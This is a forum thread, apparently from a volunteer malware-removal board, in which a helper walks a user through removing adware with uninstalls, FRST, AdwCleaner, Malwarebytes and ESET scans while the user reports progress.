ShopAtHome.com Helper
ShopAtHome.com Toolbar



Note: If any of the programs are not listed or do not uninstall, proceed to the next one and work through the list.

To do this:
Please go to Start Menu -> Control Panel -> Uninstall a program or Programs and Features
In the list of installed programs locate and click on the program to uninstall
Click uninstall.
Repeat the above steps for all the other programs to remove.



Step2- FRST fix


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Download the attached fixlist.txt to your desktop.Attached File  fixlist.txt   19.5KB   136 downloads
  • Ensure fixlist.txt is in the same location as FRST.exe on your desktop.
    FRSTfix.JPG
  • Run FRST by right clicking on it and selecting Run as Administrator and press Fix
  • On completion a log (fixlog.txt) will be generated.
  • Please select all text in this fix, copy (CTRL + C) and then Paste (CTRL + V) in your next reply.



    Step3 - run adwCleaner

    Important: Please disable your anti virus prior to running this program.. Advice on how to do this for your anti virus can be found here

    Download AdwCleaner from here to the Desktop
  • Close all open windows and browsers
  • Double click the Adwcleaner icon to execute the program
  • When the Tool opens for the first time accept the Terms of use
    adwcleaner_zpslhu4ltda.jpg
  • Click the Scan button and wait for the program to finish.
  • When finished, please click Cleaning button.
  • Upon completion, click Logfile. A log (AdwCleaner[C*].txt) will open.
  • Please copy and paste this in your next reply.

    Reboot your machine and enable your anti virus again.


    Things for your next post:
  • fixlog.txt
  • adwCleaner[C*].txt
  • How is the computer running now?

  • 0

#4
cmspears

cmspears

    New Member

  • Topic Starter
  • Member
  • Pip
  • 4 posts

Hi Bruce1270,

 

Got your reply and really appreciate your help with my problem. My computer is running a little funny, I'm seeing a lot of pop-ups and Chrome is running funny, not allowing me to print some documents. Geeks to Go is brand new to me and I'm excited you're going to be helping me. My plan is to uninstall the programs you identified first and then work through your other instructions. Thank you again for your help and I'll keep you posted on my progress.

 

Best regards,

 

CMSpears


  • 0

#5
cmspears

cmspears

    New Member

  • Topic Starter
  • Member
  • Pip
  • 4 posts

Hi Bruce1270,

 

Hope you're having a grand day! I uninstalled the programs as requested and all uninstalled fine except Get-a-Clip, which is still there. I used the express uninstall but there is a custom uninstall that that warns expert users only. I haven't tried to run that version of the uninstall. My computer is already running faster thanks to your awesome help. On Saturday I'll be continuing to work my way through your list and I'll update you then. Thank you again for your help!B

 

est regards,

 

Charlie Spears


  • 0

#6
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
Ok. Thanks for the update. :)
  • 0

#7
cmspears

cmspears

    New Member

  • Topic Starter
  • Member
  • Pip
  • 4 posts

Hi Bruce1270,

 

I finished doing all the things you told me to last night and my computer was running fine, even though I wasn't able to completely get rid of "get a clip". However, Get a clip came back this evening, but it no longer shows up on my installed software in control panel. Attached are fixlog.txt and adwcleaner.txt.

I plan to rerun ADWCleaner. Thank you again for all your help.

 

Best regards,

 

Charlie Spears

 

 

 

 

 

 

 

Attached Files


  • 0

#8
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
Hi cmspears
 

I plan to rerun ADWCleaner


You won't need to do this again. Please follow the next set of instructions below. :)

Step1 - Scan with Malwarebytes

Please download Malwarebytes' Anti-Malware from Here or Here
Double-click on mbam-setup-version-number.exe to install the application.
Before clicking Finish perform the following actions --

Un-check the box beside Enable free trial of Malwarebytes Anti-Malware Premium.
Check the box beside Launch Malwarebytes Anti-Malware

Once the program has loaded, The MBAM dashboard may appear with an alert to update - click the button Fix Now;

Navigate to the Settings tab > Detection and Protection and ensure all the boxes under Detection Options are checked.

MBAM_settings_zps3dey1yqg.jpg

Return to the Dashboard click on Scan Now;

MBAM_scan_zpsoqfjupkt.jpg

If threats are detected, make sure everything is set to Quarantine and click on Apply actions. If the program asks to reboot your PC, let it do so;
On completion of the scan click on History > Application Log. After that click on the top Scan Log > Export, select Text File and save the log to your Desktop;
Copy and Paste the contents of the log in your next reply.


Step2 - ESET on line scan


Vista / 7 users: You will need to to right-click on the either the IE or FF icon in the Start Menu or Quick Launch Bar on the Taskbar and select Run as Administrator from the context menu.

Note: You can use either Internet Explorer or Mozilla FireFox for this Scan.
  • Please go here then click on esetbar_zps93905f48.jpg.
  • You will however need to disable your current installed Anti-Virus, how to do so can be read here.
If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.

All of the following instructions work with either Internet Explorer or Mozilla FireFox.
  • Select the option YES, I accept the Terms of Use then click on Start.
  • When prompted allow Add-On/Active X to install.
  • Make sure Enable detection of potentially unwanted applications is selected.
  • Click the Advanced Settings link.
  • Make sure Remove found threats is NOT checked.
  • Make sure Scan archives IS checked.
  • Make sure Scan for potentially unsafe applications IS checked.
  • Make sure Enable Anti-Stealth technology IS checked
    2.JPG
  • Now click on Start.
  • The virus signature database will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
  • When completed the Online Scan will begin automatically. The scan may take several hours.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • When completed make sure you first copy the logfile located at C:\Program Files (x86)\ESET\Esetonlinescanner\log.txt.
  • Copy and paste that log as a reply to this topic.
  • When completed select Uninstall application on close.
  • Now click on Finish.

    Note: Do not forget to re-enable your Anti-Virus application after running the above scan!


    Step3 - Fresh FRST logs
  • Please run Farbars Recovery Scan Tool again. Run FRST by right clicking on it and selecting Run as Administrator. Allow it to update if it wants to.
  • Please tick the Addition.txt box under Optional Scan.
  • Press Scan button.
  • It will make logs FRST.txt & Addition.txt in the same directory the tool is run.
  • Please copy and paste the FRST.txt and Addition.txt to your reply.


    Things for your next post:
  • MBAM log file
  • ESET log
  • FRST.txt and Addition.txt
  • What issues remain with your computer?

  • 0

#9
Naathim

Naathim

    GeekU Minion

  • Expert
  • 4,568 posts
<p>Due to lack of feedback, this topic has been closed.<br /><br />If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.</p>
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP